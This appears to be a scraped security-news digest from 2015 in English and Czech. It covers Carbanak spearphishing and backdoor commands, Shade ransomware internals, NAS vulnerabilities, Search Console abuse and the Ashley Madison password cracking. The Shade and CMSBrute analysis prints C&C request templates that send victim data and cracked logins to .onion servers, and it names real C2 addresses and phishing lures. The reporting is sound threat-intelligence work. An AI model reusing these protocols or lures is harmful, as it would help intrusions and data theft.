You should also be wary of unsolicited emails or phone calls asking for your PIN number or password to your account. Your bank would never ask for these details in full, and certainly not over the phone or email.
Keep browsers and software up-to-date
Most cyberattacks start with ‘low hanging fruit’ – easy to solve challenges – which includes common human error, like using weak passwords, or maintaining outdated software, which has bugs that can be exploited.
Outdated internet browsers have been found to have various zero-day vulnerabilities – or flaws with no immediate fix – while the same is also true of Adobe’s Flash Player and other widely-uses software.
Cybercriminals will often look to exploit these vulnerabilities to find a way into your machine to wreak havoc.
In which case, make sure your browser is always running the latest version, and that you regularly download updates for all software running on your computer. Most modern software will check for updates automatically so you may want to install them as they become available.
Install a security solution on your devices
Antivirus software protects you, your privacy and your money by scanning and removing malware, trojans, spyware and adware, which can over your PC and steal from you.
In order to work effectively, security solution software has to download updates regularly over the internet to keep up with the threats. Out-of-date software will have flaws, and won’t be as useful.
Think who might have access to your computer
Who looks at your computer
If you flat-share or live with friends, family or work colleagues, you should think carefully about what they could potentially see.
For example, if you share laptops, iPads or Android tablets, you should ensure multi-user accounts are enforced, with separate passwords too. And if you own your own laptop you need to be wary of ‘shoulder surfers’ viewing your screen from behind.
Also, ask yourself if you need a privacy screen filter, a laptop lock or other accessories that can protect against digital and physical theft.
Log out when you finish with online banking
It may sound simple but it’s always a good idea to log out of your online banking session when you’ve done what you’ve needed too. This significantly reduces the chances of that session being hijacked.
Most banks will log you out after a few minutes anyway, but why take the risk when you can do it yourself?
Set up notifications to alert you to what’s happening
Some banks now offer a facility so that customers can set up text or email notifications to alert them to certain activities on their account. For example, if a withdrawal matches or exceeds a specified amount or the account balance drops below a certain point then a message will be sent.
These alerts could be a useful way of spotting any suspicious activity on your account.

Carbanak gang is back and packing new guns


The Carbanak financial APT group made the headlines when Group-IB and Fox-IT broke the news in December 2014, followed by the Kaspersky report in February 2015. The two reports describe the same cybercriminal gang which stole up to several hundreds of millions of dollars from various financial institutions.
However, the story is interesting not only because of the large amount of money stolen but also from a technical point of view. The Carbanak team does not just blindly compromise large numbers of computers and try to ‘milk the cow’ as other actors do, instead they act like a mature APT-group. They only compromise specific high-value targets and once inside the company networks, move laterally to hosts that can be monetized.
A few days ago CSIS published details about new Carbanak samples found in the wild.
In this blog we will describe the latest developments in the Carbanak story.
Casino hotel hack

At the end of August, we detected an attempt to compromise the network of a casino hotel in the USA. The infection vector used in this attack may have been a spearphishing e-mail with a malicious attachment using an RTF-exploit or .SCR file. The attackers’ aim was to compromise PoS servers used in payment processing.
The main backdoor used by attackers was the open-source Tiny Meterpreter. In this case, however, the source was modified – the process injection to svchost.exe was added to its functionality.
This Tiny Meterpreter backdoor dropped two different malware families:
Win32/Spy.Sekur – well known malware used by the Carbanak gang
Win32/Wemosis – a PoS RAM Scraper backdoor
As mentioned here by our colleagues from TrendMicro, Carbanak malware is capable of targeting Epicor/NSB PoS systems, while Win32/Wemosis is a general-purpose PoS RAM Scraper which targets any PoS that stores card data in the memory. The Wemosis backdoor is written in Delphi and allows the attacker to control an infected computer remotely.
Both executables were digitally signed with the same certificate:
The certificate details:
Company name: Blik
Validity: from 02 October 2014 to 03 October 2015
Thumbprint: ‎0d0971b6735265b28f39c1f015518768e375e2a3
Serial number: ‎00d95d2caa093bf43a029f7e2916eae7fb
Subject: CN = Blik
O = Blik
STREET = Berzarina, 7, 1
L = Moscow
S = Moscow
PostalCode = 123298
C = RU
This certificate was also used in the digital signature of a third malware family used by the same gang: Win32/Spy.Agent.ORM.
Win32/Spy.Agent.ORM – overview
Win32/Spy.Agent.ORM (also known as Win32/Toshliph) is a trojan used as one of their first-stage payloads by the Carbanak gang. The binary of the testing version was signed with a Blik certificate: moreover, Spy.Agent.ORM shares some similarities in the code with “the regular” Carbanak malware.
The Win32/Spy.Agent.ORM malware family is already known in the industry because of two blogposts. In July 2015 security company Cyphort reported the compromise of a news portal and a banking site – and It turns out that the compromised sites served Win32/Spy.Agent.ORM. After that, Blue Coat reported a spearphishing attempt targeting Central Bank of Armenia employees, the payload being the same.
This malware appeared on our radar at the beginning of summer 2015, and afterwards we started to track it.
We have seen attempts to attack various companies in Russia and Ukraine using spearphishing e-mails that have malicious attachments consisting of .SCR files or .RTF exploits.
Here is an example of a spearphishing email sent to one of the biggest Forex-trading companies:
Roughly translated from Russian to English, it says:
“Due to the high volatility of the ruble exchange rate the Bank of Russia sends rules of trading on the currency market. Password the attached document: cbr”
Here is another example of a spear phishing attempt. Email with this text was sent to the largest electronic payment service in Russia:
Постановлением Роскомнадзора от 04.08.2015г. Вам необходимо заблокировать материалы попадающие под Федеральный закон от 27.07.2006 N 152-ФЗ (ред. от 21.07.2014) “О персональных данных”. Перечень материалов в документе.
Пароль roscomnadzor
Another rough translation from Russian to English:
“According to Roscomnadzor prescript you should block the materials, which you can find in the attachment. Password is roscomnadzor”
We have seen similar .SCR files with following filenames:
АО «АЛЬФА-БАНК» ДОГОВОР.scr (Alfabank contract)
Перечень материалов для блокировки от 04.08.2015г.scr (List to block)
Postanovlene_ob_ustranenii_18.08.2015.pdf %LOTS_OF_SPACES% ..scr
Правила Банка России от 06.08.2015.pdf %LOTS_OF_SPACES% .scr (Rules of Bank of Russia)
All these attachments contained a password protected archive with .SCR file. The files had Adobe Acrobat reader icon or MS Word icons.
In other cases attackers used RTF files with different exploits, including an exploit for one of the latest Microsoft Office vulnerabilities, CVE-2015-1770, which was patched by Microsoft in June 2015 in MS15-059.
We have seen RTF files with the following names used in attacks:
Բանկերի և բանկային գործունեության մասին ՀՀ օրենք 27.07.2015.doc (Armenian: The Law on Banks and Banking 27.07.2015)
АО «АЛЬФА-БАНК» ДОГОВОР.doc (Russian: Alpha-bank contract)
Anti-Money Laudering & Suspicious cases.doc
AML USD & Suspicious cases.doc
Amendment inquiry ( reference TF1518869100.doc
Information 2.doc
Here is example of a spearphishing message that was sent to a bank in the United Arab Emirates:
Here is example of a spearphishing email that was sent to a German bank:
Win32/Spy.Agent.ORM – Technical details

Win32/Spy.Agent.ORM is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID. Based on that information malware operator decides whether the infected computer is useful: that is, whether it’s the intended target or just a system that was accidentally infected.
Here is list of commands that it can receive from C&C server:
Command Purpose
0x02 Collects information about computer: Computer Name, User Name, Windows Version, Architecture (32/64 bit) and campaign ID
0x03 Collects list of running processes
0x04 Downloads binary to %TEMP% and executes
0x05 Updates itself
0x06 Deletes itself
0x07 Makes screenshot
0x08 Loads binary in the memory, without dropping to the disk
The latest sample of this malware family found in the wild is also digitally signed with a different certificate:
The certificate details:
Company name: In travel TOV
Validity: from 21 July 2015 to 21 July 2016
Thumbprint: ‎7809fbd8d24949124283b9ff14d12da497d9c724
Serial number: 00dfd915e32c5f3181a0cdf0aff50f8052
Subject: CN = In travel TOV
O = In travel TOV
STREET = prospekt Pravdi 33
L = Kiev
S = Kievskaja
PostalCode = 04108
C = UA
Also, the latest sample is able to gain system privileges via an exploit and install itself as a system service. The trojan attempts to exploit a vulnerability – CVE-2015-2426 in the OpenType manager module (ATMFD.dll) – which was patched by Microsoft in MS15-078. The exploit for this vulnerability was leaked in a Hacking Team dump.
The digital certificate for Blik used in this case is not the only link between Win32/Spy.Agent.ORM and Win32/Spy.Sekur (Carbanak malware). They share similarities in code – take a look at the function that generates the BOTID-value, for example:
The BOTID-value is a unique value generated on the basis of the hardware parameters of infected computer, and it’s used by attackers for computer identification. In both cases generation is based on the MAC-address and computer name and the resulting value is formatted using the wsprintf –function.
Sinkhole statistics

Our sinkhole of some C&C domains used by the Win32/Wemosis has resulted in hits from bots in the following countries.

As the attacks are highly targeted, the total number of victims is low in absolute numbers. Victims in the USA are situated in several states, including Nevada (Las Vegas), California, and New York, and include casinos and hotels.

Even after it has reportedly stolen hundreds of millions of dollars, the infamous Carbanak APT group isn’t resting on its laurels. On the contrary, it is very active and keeps attacking specific targets related to the finance industry, including banks, Forex-trading companies, and even an American casino hotel. Recently, we have detected malware used by the Carbanak group in the following countries, among others:
United States of America
United Arab Emirates
As described in this blog post, the gang doesn’t use just one malware family to carry out its operations but several. While the code in the different families – Carbanak (Win32/Spy.Sekur), Win32/Spy.Agent.ORM, and Win32/Wemosis – is different it does contain similar traits, including the same digital certificate.
Furthermore, the attackers are updating their arsenal with the latest exploits, such as the Microsoft Office remote code execution vulnerability, CVE-2015-1770, or the zero-day exploit leaked in the Hacking Team dumps, CVE-2015-2426.
We continue to monitor the Carbanak threats. For any enquiries or sample submissions related to the subject, contact as at:
Indicators of Compromise (IoC)

Trojan.Win32/Spy.Sekur (Carbanak malware) SHA-1:
RTF-exploits SHA-1:
Trojan.Win32/Spy.Sekur C2 servers:
Trojan.Win32/Spy.Agent.ORM SHA-1:
RTF-exploits SHA-1:
Trojan.Win32/Spy.Agent.ORM – C2 Servers: ( ( (
Tiny meterpreter SHA-1:
Win32/Wemosis (PoS RAM Scraper) SHA-1:
Win32/Wemosis – C2 server:

Nebezpečné chyby ohrožují domácí datová úložiště

15.9.2015 Zranitelnosti
V posledních letech se těší stále větší popularitě tzv. NAS servery. Především v domácnostech představují ideální řešení, jak ukládat data z více počítačů, tabletů a chytrých telefonů na jedno centralizované úložiště. Jenže jak se ale nyní ukázalo, kvůli bezpečnostním chybám se mohou NAS servery stát Před chybami, které se týkají NAS serverů společnosti Synology, varoval český Národní bezpečnostní tým CSIRT. Trhliny jsou obsaženy v aplikacích Video Station a Download Station.

Kvůli chybám si může útočník dělat s napadeným NAS serverem prakticky cokoliv. „Zranitelnost umožňuje útočníkovi spustit libovolný příkaz jako root (správce systému, pozn. red.) a tak ovládnout celé zařízení,“ varoval bezpečnostní analytik Pavel Bašta z týmu CSIRT, který je provozován sdružením CZ.NIC.

Záplaty už jsou venku
Naštěstí záplaty opravující tyto chyby společnost Synology již vydala. „Uživatelé by měli záplaty nasadit pokud možno okamžitě, lze totiž očekávat, že se zranitelnosti opět pokusí někdo zneužít,“ doplnil Bašta.

Koneckonců na NAS servery se kyberzločinci zaměřili i v loňském roce, kdy internetem šířili upravenou verzi vyděračského viru cryptolocker. 

Stahovat aktualizace je možné přímo z dotčených NAS serverů v nabídce Centrum balíčků.

Crooks are abusing Google Search Console to remain under the radar


Experts at Sucuri revealed that cybercriminals are abusing Google Search Console to hide their presence in compromised websites, administrators are advised!
Security experts at Sucuri firm have discovered cyber criminals are increasingly abusing legitimate webmaster tools (Google Search Console) for black hat SEO and hide their presence on compromised websites.

Google Search Console

The operation for crooks is quite simple, they just need to upload an HTML file provided by Google to the hijacked website.

Google Search Console

“When hackers get access to a website, it’s easy for them to create this file and verify themselves as an owner. Here is some further evidence from the forum:

Search Console Account Hacked: “An HTML verification file is being placed on my server in the root directory. I am not placing it there, and it’s not being placed there using my FTP account.”
Unauthorized verification of webmaster owners: “And in my site’s file manager, I spotted these whole verification HTML files just created recently, and I have deleted those unknown files.“
Usually these files are being uploaded via vulnerabilities in web applications or via backdoors that hackers install after breaking into websites. That’s why deleting the file and changing FTP passwords is usually not enough” explained by Sucuri.

With this trick, cyber criminals don’t need to hack the legitimate owner’s Google account to assign their profile the status of “owner” in the Google Search Console.

Google allows each website to have multiple owners, but when a new one is verified, all the other owners receive a notification email. The email is sent to alert them and allow them to revoke the new ownership in case of abuses. The problem is that if the legitimate owners don’t see the notification email, the attacker can revoke their status of “verified” owner so that they no longer receive any notifications.

In this way, attackers can hide their presence and avoid Google’s threat detection systems.

As explained by Sucuri, the problem is related to the lack of notification to the legitimate owners when they have been unverified.

The researchers have discovered many forum posts from webmasters of various websites who noticed multiple new owners being added to their Google Search Console accounts.

The experts at security recommend webmasters to verify ownership of all their websites, including their subdomains, a prompt response is an effective defense against such attacks.

Experts at Sucuri suggested the following methods to avoid attackers to be able to easily unverify your account:

Via a domain name provider;
Via a Google Analytics tracking code;
Via a Google Tag Manager container snippet.
Unlike the HTML file and the Meta tag verification methods, these three require hackers to have access to your Google and domain name registrar accounts in order to be able to unverify you.

UK businesses ‘number one target for cybercriminals’


UK businesses are more likely to be the victim of cybercrime than their international counterparts, according to new data from ThreatMetrix.
Its analysis revealed that British enterprises were attacked more than double the number of times as their US counterparts, from both domestic and international sources – the latter tending to be from the US, Germany, Nigeria and Mexico.
While most cyberattacks globally originate in the US, the UK is not far behind with ThreatMetrix stating that it is “the second highest originator” of cybercrime.
Financial institutions were found to be the main target, with cybercriminals focusing their efforts on online lenders.
“Online lending is a hotbed for fraud because it is an insecure channel and targets the unbanked and underbanked population in developing countries —which tends to be a big target for attackers,” commented Dr. Stephen Moody, solutions director (EMEA) at ThreatMetrix.
“The more businesses and consumers turn to the digital space to store and manage their financial information, the more fraudsters will be on high alert—ensuring digital identities are effectively protected should be high priority for everyone.”
It was also revealed that during the second quarter of 2015, there was a “spike” in ecommerce-related cyberattacks in the UK. Attacks on financial services for this period remained steady.
Online fraud is an increasing concern for consumers across the world, so much so that many individuals would be willing to share their DNA with their banks to further secure their financial and personal data.
Earlier this year, a report by Telstra revealed that one in five respondents would feel comfortable in handing over their DNA if it meant they could feel confident about banking and managing their finances online.
“We found those with more to invest are more willing to ‘do what it takes’ to ensure security,” the Australian-based telecommunications and information services company outlined in its paper.
“A staggering 47 percent of those with a net worth of more than US $1 million would share their DNA profile with a financial provider.”

The Shade Encryptor: a Double Threat

14.9.2015 Zdroj: Kaspersky

A family of ransomware Trojans that encrypts files and adds the extensions “.xtbl” and “.ytbl” emerged in late 2014/early 2015, and quickly established itself among the top three most widespread encryptors in Russia (along with Trojan-Ransom.Win32.Cryakl and Trojan-Ransom.BAT.Scatter). This threat has been assigned the verdict Trojan-Ransom.Win32.Shade according to Kaspersky Lab’s classification. The original name given to the encryptor by its creator is not known; other security vendors detect it as Trojan.Encoder.858, Ransom:Win32/Troldesh.

There has been no appreciable evolution of this Trojan over time – only the format of the encrypted file’s name, the C&C server addresses and the RSA keys have been changing.

There are two main methods used to deliver the malware to victims’ computers: spam messages and exploit kits (in particular, NuclearEK).

When delivered via spam, the user receives a letter with a malicious file attached. The system is infected when the user attempts to open the attachment. The following file names have been used when spreading Trojan-Ransom.Win32.Shade:

doc_dlea podpisi.rar
doc_dlea podpisi.rar
неподтвержден 308853.scr
documenti dlea podpisi 05.08.2015.scr.exe
akt sverki za 17082015.scr
It should be noted that the file name changes for each mass mailing campaign, so the potential file names are not limited to those listed above.

The second delivery mechanism – via exploit kit – is more dangerous because the infection occurs when the victim unwittingly visits a compromised website. It may be a site belonging to cybercriminals, or a legitimate resource that has been hacked. In most cases, the user is completely unaware of the danger the website poses. Malicious code on the website exploits a vulnerability in the browser or a plugin, and the Trojan is then covertly installed in the system. Unlike the spam delivery method, the victim doesn’t even have to run an executable file.

After Trojan-Ransom.Win32.Shade ends up in the system, it connects to a C&C server located in the Tor network, reports the infection and requests a public RSA-3072 key that is subsequently used to encrypt files (as discussed below). Should the connection attempt fail, the Trojan chooses one of the 100 public keys that are stored within its body for just such an eventuality.

The Trojan then starts encrypting files. While scanning for objects to encrypt, it uses the static list of extensions shown in the screenshot below.


The Shade Encryptor: a Double Threat

When encryption is complete, a menacing image is set as the desktop background:


The Shade Encryptor: a Double Threat

The Trojan leaves ransom demands in the files README1.txt, …, README10.txt. The contents of these files are always the same:


The Shade Encryptor: a Double Threat

However, unlike most other encryptors, Trojan-Ransom.Win32.Shade doesn’t stop there. It doesn’t terminate its process, but instead starts an infinite loop in which it requests a list from the C&C server containing the URLs of additional malware. It then downloads that malware and installs it in the system. This sort of activity is typical of download bots. We have spotted malware from the following families being downloaded:

Trojan.Win32.CMSBrute (a more detailed description is provided below).
Below is the code for the download and listening loop:


The Shade Encryptor: a Double Threat

It is therefore very important to run a complete anti-malware scan of the computer if the Shade encryptor (or the .xtbl, .ytbl files it creates) is detected. If left untreated, the system will most probably remain infected with several malicious programs downloaded by the encryptor.

Common features of Shade family Trojans

Written in C++ using STL and its own classes.
Statically linked with Tor client.
Uses boost (threads), curl, OpenSSL libraries.
Each sample has the URL of a C&C server hardcoded in it. A total of 10 C&C server addresses were identified in various samples, eight of which are currently active. All the C&C servers are located in the Tor network.
All strings (including the names of imported functions) are AES encrypted. They are decrypted when the program starts, then the import table is dynamically populated.
Prior to setting the new desktop background, the old one is saved in the registry.
Typically packed with UPX and an extra packer. Once unpacked, it is 1817 KB in size.
Creates 10 identical files named README1.txt, …README10.txt on the victim computer, containing ransom demands in Russian and English.
A unique 256-bit AES key is generated to encrypt the contents and the name of each file. The encryption is done in CBC mode with a zero initialization vector.
Contains 100 public RSA-3072 keys with the public exponent 65537 (A total of 300 different public keys were detected in various samples).
Has the capability of downloading and launching malware.
The cryptographic scheme

Generating an infected computer ID

The Trojan obtains the computer name (comp_name) with the help of API function GetComputerName, and the number of processes (num_cpu) with the help of API function GetSystemInfo;
Using the serial number of the system volume, it calculates a 32-bit constant and converts it into a HEX string (vol_const);
Obtains data about the OS version (os_version) divided with the symbol “;” (e.g. “5;1;2600;1;Service Pack 3″);
Creates the string comp_namenum_cpuvol_constos_version;
Calculates the MD5 hash of this string;
Converts the MD5 hash into a HEX string and uses its first 20 characters as the computer’s ID.
Receiving key data

When the computer ID has been generated, the Trojan attempts to connect to the C&C server located in the Tor network, sends the computer ID to it and receives the public RSA key in return. If the connection attempt fails, one of the 100 public RSA keys hardcoded in the Trojan body is selected.

Encrypting files

The algorithm AES 256 in CBC mode is used to encrypt files. For each encrypted file, two random 256-bit AES keys are generated: one is used to encrypt the file’s contents, while the other is used to encrypt the file name. These keys are placed in the utility structure key_data, which is then encrypted with the selected RSA key (so it takes up 384 bytes after encryption) and placed at the end of the encrypted file:


The Shade Encryptor: a Double Threat

In C syntax, this stricture can be written as follows:


The Shade Encryptor: a Double Threat

The Trojan attempts to rename the encrypted file using the result of the calculation Base64(AES_encrypt(original file name)).xtbl (e.g. ArSxrr+acw970LFQw.xtbl). Failing this, it simply adds the extension .ytbl to the original file name. In later versions, the Trojan adds the infected computer’s ID and then the extension .xtbl to the file name, e.g. ArSxrr+acw970LFQw.043C17E72A1E91C6AE29.xtbl.

Communication with a C&C server

The address of one C&C server is contained in the Trojan’s body. The servers are located in the Tor network and communication is established using a Tor client that is statically linked to the Trojan.

The sample sends the following requests to the C&C server:

Request for a new public RSA key:
GET http://<server>.onion/reg.php?i=ID&b=build&v=version&ss=stage
ID – the ID of the infected computer;
build – the ID of the specific Trojan sample;
version – the Trojan’s version (we encountered versions 1 and 2);
stage – the stage of encryption – request for a new public key or a message about completing file encryption.
Error message:
GET http://<server>.onion/err.php?i=ID&b=build&v=version&err=error
error – a base64-coded message about an error during encryption.
Report about the encryptor’s current stage:
GET http://<server>.onion/prog.php?i=ID&b=build&v=version&ss=stage&c=count&f=finish
count – the current count of encrypted files;
finish – the flag showing that encryption has completed.
Information about the system:
key_number – the number of the selected RSA key (if the key was not received from the server, but selected from the keys contained in the Trojan’s body);
info – information collected from the infected computer:
Computer name
User name
IP address
Computer domain
List of logical drives
Windows version
List of installed software
Request for a list of URL addresses from which additional malware needs to be downloaded and launched:
GET http://<server>.onion/cmd.php?i=ID&b=build&v=version
Propagation of the encryptor

Partnership program

The code that the user is prompted to email to the cybercriminals can have the form ID|0 if the public code was received from the C&C server, or ID|key_number|build|version if one of the public RSA keys hardcoded in the Trojan’s body was selected, with the corresponding number used for the value key_number. ID is the identity of the infected computer, build and version are numeric values that denote respectively the ID of the specific Trojan sample and the encryptor’s version.

While analyzing the Trojan’s samples, we detected several combinations of the ‘build’ value, email addresses used to communicate with the cybercriminals, and C&C addresses. Different ‘build’ values are associated with different email addresses, although the same C&C can serve several different samples of the Trojan:

build C&C email
2 a4yhexpmth2ldj3v.onion
2 a4yhexpmth2ldj3v.onion
4 a4yhexpmth2ldj3v.onion
6 a4yhexpmth2ldj3v.onion
2 e4aibjtrguqlyaow.onion
15 e4aibjtrguqlyaow.onion
12 gxyvmhc55s4fss2q.onion
14 gxyvmhc55s4fss2q.onion
4 gxyvmhc55s4fss2q.onion
We observed the propagation of different samples from the encryptor’s two versions. For each specific sample of the same version of the Trojan there existed a unique combination of ‘build’ (ID of the specific sample) and the email address (for communication with the cybercriminals).

Although we found no partnership notices, based on the data we can assume the Trojan is distributed, and the ransom collected, via a partnership network. Possibly, the malware sample IDs (the ‘build‘ value) and the different email addresses are associated with various partners responsible for distributing this malicious program.


Most of the Trojan infections occur in Russia, Ukraine and Germany. According to KSN data, the distribution of Trojan-Ransom.Win32.Shade is as follows.

The Shade Encryptor: a Double Threat


Russia 70,88%
Germany 8.42%
Ukraine 6.48%
Austria 3.91%
Switzerland 2.98%
Poland 1.45%
Kazakhstan 1.20%
Belarus 1.07%
Brazil 0.55%
Downloaded malware: Trojan for brute forcing website passwords

Among the malicious programs downloaded by Trojan-Ransom.Win32.Shade is a trojan used for brute forcing website passwords. The internal organization of the brute forcer is very similar to that of the encryptor Trojan itself – it was most probably created by the same team of cybercriminals. This downloaded brute forcer Trojan has been assigned the verdict Trojan.Win32.CMSBrute.

Common features of the CMSBrute family

Written in C++ using STL and its own classes.
Statically linked with the Tor client.
Uses boost (threads), curl, OpenSSL libraries.
Each sample has a hardwired URL to one C&C server. A total of three C&C server addresses were detected in different samples. All the C&Cs are located in the Tor network and are different from the addresses encountered in the Trojan-Ransom.Win32.Shade samples.
All strings (along with the names of imported functions) are AES encrypted. When the program launches, they are decrypted and the import table is then dynamically populated.
Typically UPX packed. Once unpacked, it is 2080-2083 KB in size.
Copies itself to one of the C drive folders with the name csrss.exe.
Downloads additional DLL plugins. The plugins contain code that determines the content management system (CMS) installed on the targeted site, searches for the administration console and cracks passwords. We have detected plugins for websites based on Joomla, WordPress and DataLifeEngine.
Communication with the C&C server

Each sample of Trojan.Win32.CMSBrute contains the address of one C&C server. The servers are located in the Tor network and communication with them is established using the Tor client that is statically linked to the Trojan.

The sample sends the following requests to the C&C server:

Register new bot:
GET http://<server>.onion/reg.php?n=ID&b=build&v=version&sf=stage
ID – the ID of the infected computer. It is calculated using a slightly different algorithm than the one used for the Shade encryptor;
build – the ID of the specific sample of the malicious program. We have encountered build1 only;
version – the version of the malicious program. We have encountered version 1 only;
stage – the stage of the Trojan’s operation.
A request to receive URL addresses for downloading/updating DLL plugins.
GET http://<server>.onion/upd.php?n=ID&b=build&v=version&p=plugins
Request for a task to determine the CMS on the website and to check the login credentials:
GET http://<server>.onion/task.php?n=ID&b=build&v=version&p=plugins
plugins – the versions of installed DLL plugins.
The server’s response comes in the JSON format and contains URLs of the websites to be attacked and a dictionary for breaking passwords.
Send a brute force report:
POST http://<server>.onion/rep.php?n=ID&b=build&v=version&rep=report
report – a JSON string containing a report about the CMS found on the website, as well as broken login credentials to the administration console.

In the case of Trojan-Ransom.Win32.Shade, all advice that was previously given on how to counteract encryptors is still relevant. Detailed instructions are available at:

If your computer has already suffered an attack by this Trojan, it is extremely important that you run a full scan and treat it with an anti-malware solution. Remember that Trojan-Ransom.Win32.Shade downloads and installs malware belonging to several various families, as stated at the beginning of this article.


The following samples were used while writing this article:

Verdict MD5
Trojan-Ransom.Win32.Shade.ub 21723762c841b2377e06472dd9691da2
Trojan-Ransom.Win32.Shade.ui bb159b6fe30e3c914feac5d4e1b85a61
Trojan.Win32.CMSBrute.a 543d1620ce976cb13fec190ccc1bc83a

Another computer system at the Pentagon has been hacked


Another cyber attack hit computer systems at the Pentagon, this time the food court computers have been hacked exposing employees’ bank information.
In August, alleged Russian hackers have hacked an unclassified emailing server of the Pentagon, it was just one of the numerous attacks against the US Government systems.

According to the NBC news, US officials have reported that Russia launched a “sophisticated cyberattack” against the Pentagon’s Joint Staff unclassified email system. The unclassified email system has been shut down and taken offline for two weeks. The officials added that the cyber attack compromised data belonging to 4,000 military and civilian personnel who work for the Joint Chiefs of Staff.

“According to the officials, the “sophisticated cyber intrusion” occurred sometime around July 25 and affected some 4,000 military and civilian personnel who work for the Joint Chiefs of Staff.”states the NCB news.

Now, reportedly the computer systems of Pentagon’s food court were breached by attackers and financial details of an unspecified number of employees have been compromised.

On Tuesday, the official spokesman of Defense Department, Lt. Col. Tom Crosson, confirmed the incident and the exposure of the credit card data of the employees who paid concessions at the Pentagon.


The US authorities have immediately notified the data breach to the employees who used either debit or credit card for the payments.

“”Within the past week, the Pentagon Force Protection Agency has received numerous reports of fraudulent use of credit cards belonging to Pentagon personnel. These individuals had fraudulent charges to their account soon after they had legitimate transactions at the Pentagon,” according to a copy of the notice to employees obtained by the Washington Examiner.”
Crosson did not provide further information on the attack neither data on the number of employees affected, it is still unclear which food court was attacked by hackers.

The US government suffered several major cyber attacks recently, including the recent hack of the Office of Personnel Management (OPM) and the network at the White House. In August, the New York Times published an article saying that the president of the United States, Barack Obama took the decision to retaliate against China, after the famous hack of the OPM, leaving in the wild over 20 million personal records.

In April, the President Barack Obama has signed an executive order that uses economic restrictions to “control” anyone that is trying to attack any American interests.

The news of this new attack comes a few days after the announcement that the US Government is considering sanctions against both Russian and Chinese hackers in response to the hacking campaign targeting US entities.

The news was reported by several U.S. officials yesterday who spoke on condition of anonymity. The Obama administration was already considering to punish hackers and organizations targeting US entities, recently it proposed sanctions for Chinese hackers and individuals and firms from other nations responsible for cyber attacks against American commercial companies.



Kdo má Synology NAS, ten by měl určitě co nejdříve záplatovat software Synology Video Station, ve kterém bylo nalezeno několik závažných zranitelností SQL injection a také zranitelnost command injection. Ta v nejhorší možné konstelaci (se zapnutou volbou „public share“) umožňuje spuštění libovolného příkazu vzdáleným útočníkem a navíc s právy roota. Doufejme, že žádného z uživatelů těchto NAS disků nepotká v dohledné době stejná katastrofa, k jaké došlo v několika případech v minulém roce. Tehdy útočníci využili již známou a záplatovanou zranitelnost k napadení systému ransomwarem cryptolocker.

NIST (National Institute of Standards and Technology) financuje několik startupových projektů, které pracují na bezdotykových čtečkách otisků prstů. Oficiálním důvodem má být urychlení celého procesu čtení otisků a obavy o hygienickou stránku věci. Osobně bych měl spíš obavy z možného zneužití takovéhoto zařízení, ať už ze strany zločinců, nebo ze strany různých vládních organizací.

Bezdrátové disky Seagate (Seagate Wireless Plus Mobile Storage, Seagate Wireless Mobile Storage a LaCie FUEL) obsahují závažné zranitelnosti Direct Request (‚Forced Browsing‘), Unrestricted Upload of File with Dangerous Type a také nedokumentovanou službu telnet dostupnou s pomocí jména a hesla root. Za upozornění děkujeme uživateli s nickname Jenda.

Aplikace Adult Player pro Android slibovala pornografické materiály, místo toho tajně pořizovala fotografie uživatelů. Ty pak tento ransomware zobrazil na obrazovce telefonu spolu s požadavkem na zaplacení částky 500 dolarů.

Uživatelé seznamky Ashley Madison mají další problém. Během deseti dnů se podařilo cracknout více než 11 milionů uživatelských hesel. Členové skupiny CynoSure Prime se pustili do analýzy uniklého zdrojového kódu stránek. Tak zjistili, že část uživatelů má svůj loginkey vytvořen pomocí MD5. V proměnné loginkey je pak jak uživatelské jméno, tak heslo, ovšem obě jsou zde uloženy v podobě, kdy mají všechna písmena pozměněna na malá. I když jsou hesla tímto způsobem upravena, pomohlo to urychlit získávání hesel z uniklých hashů hesel, které byly vytvořeny pomocí funkce bcrypt a jejichž prolamování by bez této výpomoci bylo příliš náročné. Díky jejich práci se můžeme pokochat žebříčkem třiceti nejhorších hesel z Ashley Madison. Překvapí ještě někoho, že heslo 123456 používalo 120 511 uživatelů?

V řadě aplikací a her přímo v Google Play byl nalezen malware Android.Trojan.Mkero.A. Ten je znám již od roku 2014, ale toto je jeho první výskyt v oficiálním obchodu Google Play. Tento trojský kůň dokáže obejít CAPTCHA ochranu přeposláním obrázku on-line službě, která během chvilky vrátí tomuto malware potřebný výsledek. Kromě toho umí také nalézt v SMS potřebný aktivační kód. Tento malware totiž slouží k přihlašování uživatelů k prémiovým službám, pochopitelně bez vědomí dotyčných uživatelů. Mezi aplikacemi v Google Play, které obsahovaly tento malware, byly dvě, které měly několik set tisíc stažení.

Devadesát jedna procent Američanů se údajně domnívá, že přínos přidání zadních vrátek do šifrovacích mechanismů omlouvá rizika s tím spojená. Snad je celý průzkum v duchu hesla „věřím pouze těm statistikám, které jsem sám zfalšoval“.

Hackeři prolomili už 11 milionů hesel ukradených seznamce Ashley Madison

13.9.2015 Hacking

Hackeři prolomili už 11 milionů hesel ukradených seznamce Ashley MadisonDnes, Milan Šurkala, aktualitaV červenci ukradli hackeři záznamy více než 36 milionů lidí ze seznamky Ashley Madison, která se specializuje na hledání partnerů pro manželskou či jinou nevěru. Data byla zveřejněna a 11 milionů hesel hashovaným pomocí MD5 už bylo prolomeno.Ashley Madison je online seznamka, která slouží k hledání partnerů a partnerek pro nevěru. V červenci 2015 byla ale hacknuta a hackeři ze skupiny The Impact Team byli schopni získat data přes 36 milionů uživatelů seznamky. Hesla byla zašifrována pomocí algoritmu bcrypt, jehož rozšifrování by mělo trvat minimálně desítky let. Amatérská skupina CynoSure Prime vzala tato ukradená data a zjistila zajímavou skutečnost. Přestože spousta hesel je skutečně zašifrována pomocí algoritmu bcrypt a tedy v podstatě v normální časovém horizontu nerozšifrovatelná, okolo 15 milionů hesel sice využívalo uložení hesla pomocí bcrypt, ale nechyběl ani MD5 hash. A MD5 je tak slabý hashovací algoritmus, že je rozšifrovatelný v podstatě okamžitě.
